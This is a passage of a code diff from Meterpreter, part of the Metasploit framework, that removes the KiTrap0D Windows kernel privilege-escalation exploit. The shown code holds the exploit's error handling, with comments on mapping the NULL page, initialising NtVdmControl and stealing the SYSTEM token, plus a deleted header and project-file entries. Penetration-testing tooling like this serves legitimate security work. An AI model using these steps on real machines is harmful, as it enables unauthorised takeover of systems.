// Try running `kd -kl -c 'uf nt!VdmpGetVdmTib;q'` and looking for the size comparison.
BREAK_WITH_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to find the size of the VDM_TIB structure", dwExitCode );
case 'NTAV':
// NtAllocateVirtualMemory() can usually be used to map the NULL page, which NtVdmControl()
// expects to be present.
// The exploit thread reports it didn't work.
BREAK_WITH_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to map the virtual 8086 address space", dwExitCode );
case 'VDMC':
// NtVdmControl() must be initialised before you can begin vm86 execution, but it failed.
// It's entirely undocumented, so you'll have to use kd to step through it and find out why
// it's failing.
BREAK_WITH_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports NtVdmControl() failed", dwExitCode );
case 'LPID':
// This exploit will try to transplant the token from PsInitialSystemProcess on to an
// unprivileged process owned by you.
// PsLookupProcessByProcessId() failed when trying to find your process.
BREAK_WITH_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports that PsLookupProcessByProcessId() failed", dwExitCode );
case FALSE:
// This probably means LoadLibrary() failed, perhaps the exploit dll could not be found?
// Verify the vdmexploit.dll file exists, is readable and is in a suitable location.
BREAK_WITH_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to load the injected dll", dwExitCode );
case 'w00t':
// This means the exploit payload was executed at ring0 and succeeded.
BREAK_WITH_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports exploitation was successful", ERROR_SUCCESS );
default:
// Unknown error. Sorry, you're on your own.
BREAK_WITH_ERROR( "[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread returned an unexpected error. ", dwExitCode );
}
} while( 0 );
if( hVdm )
{
TerminateProcess( hVdm, 0 );
CloseHandle( hVdm );
}
if( hThread )
CloseHandle( hThread );
return dwResult;
}

36
c/meterpreter/source/extensions/priv/server/elevate/kitrap0d.h
View File

@ -1,36 +0,0 @@
#ifndef _METERPRETER_SOURCE_EXTENSION_PRIV_PRIV_SERVER_ELEVATE_TECHNIQUES_KITRAP0D_H
#define _METERPRETER_SOURCE_EXTENSION_PRIV_PRIV_SERVER_ELEVATE_TECHNIQUES_KITRAP0D_H
#define PAGE_SIZE 0x1000
enum { SystemModuleInformation = 11 };
typedef struct
{
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct
{
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef struct CodeSignature
{
UCHAR Signature[16];
DWORD Version;
};
DWORD elevate_via_exploit_kitrap0d( Remote * remote, Packet * packet );
#endif

2
c/meterpreter/source/extensions/priv/server/elevate/tokendup.c
View File

@ -78,7 +78,7 @@ DWORD elevate_via_service_tokendup( Remote * remote, Packet * packet )
{
// only works on x86 systems for now...
if( elevate_getnativearch() != PROCESS_ARCH_X86 )
BREAK_WITH_ERROR( "[KITRAP0D] elevate_via_service_debug. Unsuported platform", ERROR_BAD_ENVIRONMENT );
BREAK_WITH_ERROR( "[ELEVATE] elevate_via_service_debug. Unsuported platform", ERROR_BAD_ENVIRONMENT );
os.dwOSVersionInfoSize = sizeof( OSVERSIONINFO );

2
c/meterpreter/workspace/elevator/elevator.vcxproj
View File

@ -403,13 +403,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\source\elevator\elevator.c" />
<ClCompile Include="..\..\source\elevator\kitrap0d.c" />
<ClCompile Include="..\..\source\elevator\namedpipeservice.c" />
<ClCompile Include="..\..\source\elevator\tokendup.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\source\elevator\elevator.h" />
<ClInclude Include="..\..\source\elevator\kitrap0d.h" />
<ClInclude Include="..\..\source\elevator\namedpipeservice.h" />
<ClInclude Include="..\..\source\elevator\tokendup.h" />
</ItemGroup>

2
c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj
View File

@ -639,7 +639,6 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</ClCompile>
<ClCompile Include="..\..\source\extensions\priv\server\elevate\elevate.c" />
<ClCompile Include="..\..\source\extensions\priv\server\elevate\service.c" />
<ClCompile Include="..\..\source\extensions\priv\server\elevate\kitrap0d.c" />
<ClCompile Include="..\..\source\extensions\priv\server\elevate\namedpipe.c" />
<ClCompile Include="..\..\source\extensions\priv\server\elevate\tokendup.c" />
<ClCompile Include="..\..\source\extensions\priv\server\fs.c">
@ -666,7 +665,6 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClInclude Include="..\..\source\extensions\priv\priv.h" />
<ClInclude Include="..\..\source\extensions\priv\server\elevate\elevate.h" />
<ClInclude Include="..\..\source\extensions\priv\server\elevate\service.h" />
<ClInclude Include="..\..\source\extensions\priv\server\elevate\kitrap0d.h" />
<ClInclude Include="..\..\source\extensions\priv\server\elevate\namedpipe.h" />
<ClInclude Include="..\..\source\extensions\priv\server\elevate\tokendup.h" />
<ClInclude Include="..\..\source\extensions\priv\server\fs.h" />